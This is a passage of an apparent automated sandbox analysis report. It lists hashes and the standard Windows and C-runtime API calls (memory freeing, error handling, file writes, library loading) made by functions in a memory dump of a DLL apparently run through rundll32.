                                                                                                                                                                                                                                                                    • Opcode ID: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction ID: c30f1c125f4d8d96e09fbba9d648f03eba2003405368d434e649a846f3ba32d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89fb8a6629044aadd5b89d7d0fe7843b440c4d45bb862605e9be3829b6a029d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3C17AB5C0422EAFCF15CFE4C88099EBB7ABF46315F20455AE8116B249DB31DA61CF91
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D27E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D28A
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D295
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2A0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2AB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2B6
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2C1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2CC
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2D7
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D2E5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction ID: 97eae551447f59d9f4220a35069cb2041860641c9e00c284b1040b41b4561110
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f72fbd0f187e58208024119c1af356774bea16056e3331e8826c5ce6e2e4dffe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 052187BA94011CAFCF41DFE4D890DDD7BBAFF08244B218566E9199B121DB31DA55CF80
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction ID: 19ec7bd6c306872e3df39dc9319bac30a882b955fdce2cc641e6d8f66d2fe56b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f032beec8e7be82919b742781db431c000ba9a4d0a581797c3dbcd09a25ed867
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EC1BFB490421EDFDB09CFE8C894FADBBB6BF99304F104459E4159B281E7709981CF62
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E245818: _free.LIBCMT ref: 6E24583D
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24589E
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458A9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2458B4
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245908
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245913
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24591E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E245929
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction ID: e200c28aa309deb199ffb0a7d1aae8d8150d25cca04757747193a0a81902d3e0
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2536a4e061a4774c2413857fa71987725cc3c57037fa6d39a53ba6d9bf290c9a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0116DB5590B0CEBE725A7F0DC06FCB779EAF00704F508C14A6EE66050DB65A5454F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6E243593
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E243772
                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 6E24378F
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,6E23F5F6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2437D7
                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E243817
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6E2438C3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4031098158-0
                                                                                                                                                                                                                                                                    • Opcode ID: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction ID: 0d1e64fe4c333ceb160657491c870788f40800a22dbcda45e6c6c0ff1a012c30
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8fbb2a55b857db37d008f2e8467b4e1bb3a6be7f98c548b194fe346c5bbc16d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50D187B5D0025EDFCF19CFE8C8849EDFBB6BF49314F24016AE855AB241D630AA46CB50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,6E238DA8,6E23700A,6E237312), ref: 6E2391A7
                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2391B5
                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2391CE
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,6E238DA8,6E23700A,6E237312), ref: 6E239220
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                    • Opcode ID: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction ID: 930277948b7e7d787cff071e99c6885fe24a7b571aceae47d41331a3c5d5c687
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60ae02611749972d842b700a6a022a784de06b2222b6f7eb8186a65568a7fc9e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 310122F2219A3F9FEF1411F5AC8CA96375BEB03779730022AE520910C9EF924825DD24
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 1740715915-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction ID: 36f33edce26857166440eb809913867e5f9506fd293a054d9989b9538df4a162
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c98c0a8c22912f7a8176bdbd3770440f331ecb41c43c7e77dc0dadf1a08ae1b6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D451A0F650462F9FDB148FD9C850BAAB7BAAF02715F204529E8154A2D8DF31E860CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6E24120C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                    • API String ID: 0-2837366778
                                                                                                                                                                                                                                                                    • Opcode ID: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction ID: f25f4eab8f2f5374e3eda02fb91543d6349478fe7a208cedafa672b80af60d9c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6550e506ada450b4f32768c1e5ee30bf7dfdfe672b1a57dd6a9019d2a9035819
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C218E7161422EEF9B58DFE5DC80D9B77AFAF053697104A14F928D7150E730ECA88BA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457C7
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: HeapFree.KERNEL32(00000000,00000000,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?), ref: 6E23D6A0
                                                                                                                                                                                                                                                                      • Part of subcall function 6E23D68A: GetLastError.KERNEL32(?,?,6E245842,?,00000000,?,6E270096,?,6E245869,?,00000007,?,?,6E242AD1,?,?), ref: 6E23D6B2
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457D9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457EB
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E2457FD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E24580F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                    • Opcode ID: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction ID: 7d08c920d93dffcf1ec1fdc7d3acf7916c15eb3a41dfdec6daa18bebbd77aea9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6cfef0e0eea268b052397803a2f4b4ea3abc4b3350a38ab18bafc1ef3de69ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FF0377148062EDB8B94DA98F8C8C4A33EFBB007127714809E4ACD7500DB31F8808EA4
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID: *?
                                                                                                                                                                                                                                                                    • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                                                    • Opcode ID: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction ID: edf36dcc8f8690f171f25a929bab9b3563e75a4eaf6223be9e423c542be32cbd
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be0b59ba3c73918a4b6b6aaecc14d9a85920bed4f98c2dc0d16ea2f4ec30d012
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37614CB5D0021EDFCB18CFA8C8809DDBBF6EF58314B248569D815E7304E775AA818F90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6E238E5F
                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6E238F13
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                    • String ID: csm$y#n
                                                                                                                                                                                                                                                                    • API String ID: 3480331319-2264020820
                                                                                                                                                                                                                                                                    • Opcode ID: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction ID: 0c78d4a9b987671d6dea87edb5512f9bf97fdd85dcde71b351a3198715b3d5a9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53c551ef0f91e53f92d586c355918dea2692a6dd600710c15c5a8fba4c3db24d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF41E5B491022E9BCF44CFA8C844A9EBBB7BF45318F208556E9189F381D7329A01CF90
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 6E2398AB
                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 6E239991
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                                    • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                                    • Opcode ID: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction ID: cd0c1d6e432eb3fc75652b6c5156116ba26da7a9ad62c8d82514666e3ede15e6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f195f029b380c9684bd775e41b6d07bd2dfeb0883ed15374457165f229a0e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 514159B190021EAFCF02CFD4CC80AEE7BB6BF49305F244059E91967259DB35A960DF50
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,6E26947C,00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C325
                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,6E269494), ref: 6E23C338
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,6E23C2C2,?,?,6E23C28A,?,?,?), ref: 6E23C35B
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                    • String ID: y#n
                                                                                                                                                                                                                                                                    • API String ID: 4061214504-1692166551
                                                                                                                                                                                                                                                                    • Opcode ID: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction ID: 7a687c9d759b45a116d3db7e8a1899168a40b42ce57c36f168b3c302217ccc25
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa1209aeff62d775ae76282ee327f6e109fea5a59c4830fcbc2cc39d42f3c454
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF0827150052FFBDF01AB91C94DBDDBB76EB00756F140060E905A5150CB728E50DEA0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DAD
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E246DD6
                                                                                                                                                                                                                                                                    • SetEndOfFile.KERNEL32(00000000,6E244603,00000000,6E23FCD2,?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000), ref: 6E246E08
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6E244603,6E23FCD2,00000000,?,?,?,?,00000000,?), ref: 6E246E24
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1547350101-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction ID: c735588c6742cc2f8f27a00a8e403b67b311d0d6bd923d6dffa6f3614900a652
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cf6a4ee52532d02ec7873fc54d2fe10dd95c413885a2e307526fdd450338089
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF41C2BA920A0EDBDB096FF8CC80FCD37BBAF45365F240914E424A7194EB71C8448E21
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 6E2410C1: _free.LIBCMT ref: 6E2410CF
                                                                                                                                                                                                                                                                      • Part of subcall function 6E241C1A: WideCharToMultiByte.KERNEL32(?,00000000,6E23F667,00000000,00000001,6E23F5F6,6E243EDB,?,6E23F667,?,00000000,?,6E243C4A,0000FDE9,00000000,?), ref: 6E241CBC
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6E240B07
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B0E
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E240B4D
                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 6E240B54
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 167067550-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction ID: 1df7ba487e0dbb17035138ddd7d6e0fc38cdfd839efbd40d635a7ee08f2b41af
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e8f8ff1ad683a03588f043c0a7ee94e31e75e5ee58ba20ae700419b0ab8e5d3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D621C47160421EEF9B199FE6CC90C9B77BFEF113687104914E92987140E731EC908FA6
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction ID: ee0efca33cca45524b456867e12551e4ec800044271664178559e85a45e6f741
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1478d614d4fe1469bb8aee1714bd6194960fb516bda7eaddc93b7203bb598ae9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B212779F0162BEBCB169AE9CC84B5B376B9B03B61F110510ED15A7280E770ED68C9F0
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,6E243991,?,00000001,6E23F667,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?), ref: 6E23D3B1
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D40E
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D444
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E243E50,00000001,?,?,?,6E23F5F6,?,?,?,6E26EBD8,0000002C,6E23F667), ref: 6E23D44F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction ID: b6521156d952190c61ba2f454fa89e596b8427a820dcfb5bb5a10a338ec00fe7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5624dc61bfc156235aaabe2c852a64ec71db10d3117b141724cb2a7a7bf4a7ad
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2411EBB620462EABDB5516F6DC84F5A235FA7C2679F350524F624D71C0EFA29C04CD31
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,00000001,6E270096,6E23D67C,6E23D707,6E270094,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D508
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D565
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 6E23D59B
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6E2700D0,000000FF,?,6E237E19,6E270096,6E270094,?,?,?,6E234DCE,00000001,6E270098), ref: 6E23D5A6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2283115069-0
                                                                                                                                                                                                                                                                    • Opcode ID: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction ID: f8298283d072e4fc48fcfb5ec16d1f3ae90cb959e10be8ca6ffc9353df4fb204
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5c6f6623fec620917263e49b3893070a8727faa3485e867b711c850677bee4c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A110AF625062AAFDB5616F6DC84F5A235FA7C267DB300724F528D31C0EBA28808CD30
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,6E23A304,?,?,6E27C7C4,00000000,?,6E23A42F,00000004,6E2693A4,6E26939C,6E2693A4,00000000), ref: 6E23A2D3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.609076129.000000006E1FE000.00000020.00020000.sdmp, Offset: 6E1FE000, based on PE: false
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3664257935-0
                                                                                                                                                                                                                                                                    • Opcode ID: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction ID: 4add0e76b800213f7974f452410f2f2f3ea3bbc44c7d122cad41fc2d19ff3337
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b91c8622159262a58a474c354ba782cfd22e5975eda48d92c158cbad64805fd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5011A7F1A4593BABDF729AE9CC44B4933A69B06761F210131ED11A7284D6B1E900CEE1
                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WriteConsoleW.KERNEL32(?,?,6E23F667,00000000,?,?,6E246B80,?,00000001,?,00000001,?,6E243920,00000000,?,00000001), ref: 6E247C03
